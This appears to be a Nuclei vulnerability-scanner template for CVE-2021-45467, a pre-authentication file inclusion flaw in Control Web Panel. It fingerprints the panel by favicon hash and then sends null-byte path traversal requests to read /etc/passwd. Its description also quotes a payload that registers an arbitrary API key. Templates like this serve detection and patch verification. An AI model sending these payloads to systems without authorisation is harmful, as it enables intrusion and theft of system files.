id: CVE-2021-45467

info:
  name: Control Web Panel (CWP) - File Inclusion
  author: ritikchaddha
  severity: critical
  description: |
    In CWP (Control Web Panel, previously CentOS Web Panel) before version 0.9.8.1107, an unauthenticated attacker can abuse null byte (%00) injection with the "scripts" parameter in the /user/loader.php or /user/login.php endpoints to register arbitrary API keys or access sensitive files. This can be exploited by using multiple %00 sequences to traverse directories via crafted requests such as /user/loader.php?api=1&scripts=.%00./.%00./api/account_new_create&acc=guadaapi, or similar payloads with more %00 instances (e.g., .%00%00%00./.%00%00%00./api/account_new_create). Attackers may use this flaw for arbitrary file access, privilege escalation, or remote code execution.
  impact: |
    A remote, unauthenticated attacker can leverage this vulnerability to register arbitrary API keys, access sensitive files (such as /etc/passwd), and potentially achieve remote code execution. Successful exploitation results in full compromise of the web panel and host system, allowing for exposure of confidential data, server takeover, and further attacks on internal infrastructure.
  remediation: |
    Update to version 0.9.8.1107 or later to fix input validation issues.
  reference:
    - https://octagon.net/blog/2022/01/22/cve-2021-45467-cwp-centos-web-panel-preauth-rce/
    - https://nvd.nist.gov/vuln/detail/CVE-2021-45467
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2021-45467
    epss-score: 0.88128
    epss-percentile: 0.99502
    cwe-id: CWE-862
    cpe: cpe:2.3:a:control-webpanel:webpanel:*:*:*:*:*:*:*:*
  metadata:
    verified: false
    max-request: 5
    vendor: control_webpanel
    product: webpanel
    fofa-query: icon_hash="-356182173"
  tags: cve,cve2021,cwp,rce,lfi,centos,webpanel,vkev

flow: http(1) && http(2)

http:
  - method: GET
    path:
      - "{{BaseURL}}/login/cwp_theme/original/img/ico/favicon.ico"
      - "{{BaseURL}}/login/design/img/ico/favicon.ico"
      - "{{BaseURL}}"

    redirects: true
    stop-at-first-match: true

    matchers:
      - type: dsl
        dsl:
          - "status_code==200 && ('-356182173' == mmh3(base64_py(body)))"
          - "status_code==200 && contains_any(tolower(body), 'control webpanel', 'cwp | user')"
        condition: or
        internal: true

  - method: GET
    path:
      - "{{BaseURL}}/user/index.php?api=1&scripts=.%00%00%00./.%00%00%00./.%00%00%00./.%00%00%00./.%00%00%00./.%00%00%00./.%00%00%00./.%00%00%00./.%00%00%00./.%00%00%00./.%00%00%00./.%00%00%00./etc/passwd"
      - "{{BaseURL}}/user/login.php?api=1&scripts=.%00%00%00./.%00%00%00./.%00%00%00./.%00%00%00./.%00%00%00./.%00%00%00./.%00%00%00./.%00%00%00./.%00%00%00./.%00%00%00./.%00%00%00./.%00%00%00./etc/passwd"

    stop-at-first-match: true
    matchers-condition: and
    matchers:
      - type: regex
        regex:
          - "root:.*:0:0:"

      - type: status
        status:
          - 200
# digest: 4a0a0047304502201f07a5d36856bfc24db03f3d0106feb8b923ca9b96bd02d2d7bdece48f0f47e3022100dcf88dcea64f7ce1dcaca97d1051563297c7ffb0e6c0d6c4fd993e32c4356bd3:922c64590222798bb761d5b6d8e72950